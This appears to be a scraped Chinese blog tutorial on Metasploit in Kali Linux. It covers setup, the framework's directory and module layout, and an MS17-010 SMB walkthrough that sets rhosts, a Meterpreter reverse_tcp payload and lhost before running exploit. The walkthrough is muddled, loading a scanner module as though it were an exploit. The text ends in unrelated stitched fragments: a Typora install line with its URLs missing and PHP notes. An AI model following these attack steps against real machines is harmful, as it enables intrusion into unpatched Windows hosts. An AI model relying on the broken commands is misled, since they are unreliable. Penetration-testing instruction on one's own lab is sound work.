一、使用metasploit前的準備工作
修改yun源
vim /etc/apt/sources.list
更新apt-get update
apt-get upgrade
apt-get update:更新源列表。如果修改源列表或者想要進行同步重新整理或新增新的源,應該執行上面的命令。
安裝簽名
apt-key add archive-key.asc
使用metasploit先啟用postgresql服務
systemctl start postgresql
允許開機啟動postgresql
systemctl enable postgresql
構建資料庫快取
msfdb init
開啟msfconsole
msf在bt5下存放目錄:/opt/msf
msf kali 下存放目錄:/usr/share/msf-framework/
modules:使用者用到的各種模組幾乎都在這裡,使用者使用use這個msf這裡時,就是用到這個目錄下的模組。
這個目錄下的檔案在msfconsole啟動時會被自動載入的,如果看到msfconsole啟動時有出錯資訊但又能
成功啟動可以根據出錯資訊找到解決方法,個人寫的module也可以放到這個目錄下。
二、這裡主要介紹/opt/metasploit/msf3/
這個目錄下的東西,使用者經常用到的各種exploits 指令碼什麼的就在這個目錄下。
msf3 這個木下有 data ,documentation,external,lib,modules,plugins,scripts,test ,tool 這幾個目錄 ,下面是這幾個目錄的解釋:
data :這個目錄裡盛放了meterpreter ,passivex,vnc,dlls,等這些工具和一些使用者介面**,msfweb
和一些其他模組用到的資料檔案
documentation:msf的說明文件(使用者把這裡的文件研究透了就會用msf了),ruby 樣列,msfapi 等。
external:包含了meterpreter,vnc ,passivx 等工具的源**
modules: 使用者用到的各種模組幾乎都在這裡 ,使用者使用 use
這個msf這裡時,就是用到了這個目錄下的模組。這個目錄下的檔案在msfconsole啟動時會被自動載入的,如果看到msfconsole啟動時有出錯資訊但又能成功啟動可以根據出錯資訊找解決方法,個人寫的module也可以放在這個目錄下。
plugins: 這裡的模組使用者需要使用load 來載入,提供資料庫連線外掛程式,和各種要用到的外掛程式。
scripts
:這個目錄下的檔案大都是meterpreter這個模組利用的指令碼。比如郭meterpreter裡用到的migrate來轉移到其他程序的指令的源**就在這個目錄下。
tools 包含一些有用的指令碼和零散的工具。
主要的幾個資料夾就簡單的介紹到這裡,沒說到的資料夾實際應用中會很少用到。
三、下面專門說一下modules 資料夾(模組):
modules這個資料夾下有
auxiliary ,encoders,exploits,nops,payloads,post,
這幾個資料夾,他們包含的檔案指令碼有不同的用途。
auxiliary:主要包含***測試中一些輔助性的指令碼,這些指令碼功能有掃瞄,嗅探,破解,注入,漏洞挖掘,等
exploits:主要包含了傳說中的exp,0day,各種漏洞利用的指令碼。主要的攻擊**全在這,這裡邊包含的 exploit 的路徑的命名規則是 系統/服務/模組 ,使用exploit是可以根據這個命名方法來找(也可以用search這條指令來找)。比如:use exploites/windows(系統)/vnc(服務)/realvnc_client(模組名)
payloads :載荷 是攻擊者傳送給系統執行的指令(不包含exploits 攻擊階段)payloads 主要是在目標機執行的,而exploits是在本地機執行作用於目標機。命名規則是: 系統/型別/名稱
比如:use payloads/windows/shell/bind_tcp
post:這個目錄裡放著msf 的exploits執行成功後,向目標機傳送的一些功能性指令比如:提權,獲取hash等。
nops 這裡主要放著調整shellcode 前置nop指令長度的工具(不理解沒關係)
encoders :各種編碼工具 用於躲過***檢測和過濾系統。
四、使用metasploit
第1步:
終端開啟metasploit
輸入help 檢視msfconsole 常用命令
第2步:
在metasploit靶機中存在smb_ms17_010服務漏洞,針對此漏洞進行滲透測試,在metasploit中查詢攻擊smb_ms17_010的模組search smb_ms17_010
第3步:
確定該模組路徑後,我們使用該模組進行滲透測試:use auxiliary/scanner/smb/smb_ms17_010
或者use 2
可通過info
檢視相應的資訊
可通過show options
檢視相應的選項
通過show options
檢視相應的選項後,可使用set rhosts 192.168.25.131
等,配置被攻擊方引數 (yes為必填引數)
配置完引數後,設定tcp連線(木馬後門)set payload windows/x64/meterpreter/reverse_tcp
最後一部分reverse_tcp
可以通過tab鍵選擇其他選項,
可通過set lhost 192.168.25.139
配置攻擊方位址
第4步:
設定全部完成,開始執行滲透,輸入命令exploit
出現metasploit表示成功 輸入shell
沒有會話產生表示沒有成功,因為沒有這個漏洞。
使用漏洞,工具 kail下的metasploit
檔案共享服務,存在安全隱患 smb服務 服務上有漏洞 有關於smb的乙個漏洞 漏洞編號 ms17 010 存在該漏洞的常用作業系統 2008 window 7 做伺服器需要關閉防火牆,不給其他人提供服務了 kail下的msf 先ping通,啟動msf 啟動命令 msfconsole 輔助模組 aux...
關於在Kail安裝Typora的問題
開啟終端,執行 wget qo sudo apt key add echo e ndeb sudo tee a etc apt sources.list sudo apt get update sudo apt get install typora下面是官方的做法 wget qo sudo apt ...
kail中tools的安裝和第乙個php學習筆記
php學習筆記 php 標量型別之字串 一.在字串中包含引號 1.在單引號中嵌入雙引號,在雙引號中嵌入單引號 str1 hhhhh echo str1 str2 hhhhh echo str2 2.使用轉義符 str hhhhh echo str 二.當字串中包含變數時 當雙引號中包含變數時,變數會...